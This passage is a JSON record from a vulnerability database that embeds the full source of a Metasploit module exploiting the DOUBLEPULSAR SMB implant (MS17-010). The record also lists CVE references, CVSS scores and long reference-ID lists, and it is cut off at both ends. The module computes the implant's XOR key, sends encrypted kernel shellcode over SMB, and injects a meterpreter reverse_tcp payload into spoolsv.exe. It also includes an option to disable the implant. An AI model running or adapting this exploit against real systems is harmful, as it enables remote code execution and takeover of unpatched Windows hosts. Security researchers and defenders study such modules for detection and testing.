"viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-21T22:27:03", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-21T22:27:03", "rev": 2}}, 
"objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 
'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-22] #"}, "lastseen": "2021-10-21T22:27:03", "differentElements": ["sourceData"], "edition": 51}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "09a3e0d3fb585848b26d4a6ab71d13cf", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-23T14:17:45", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": 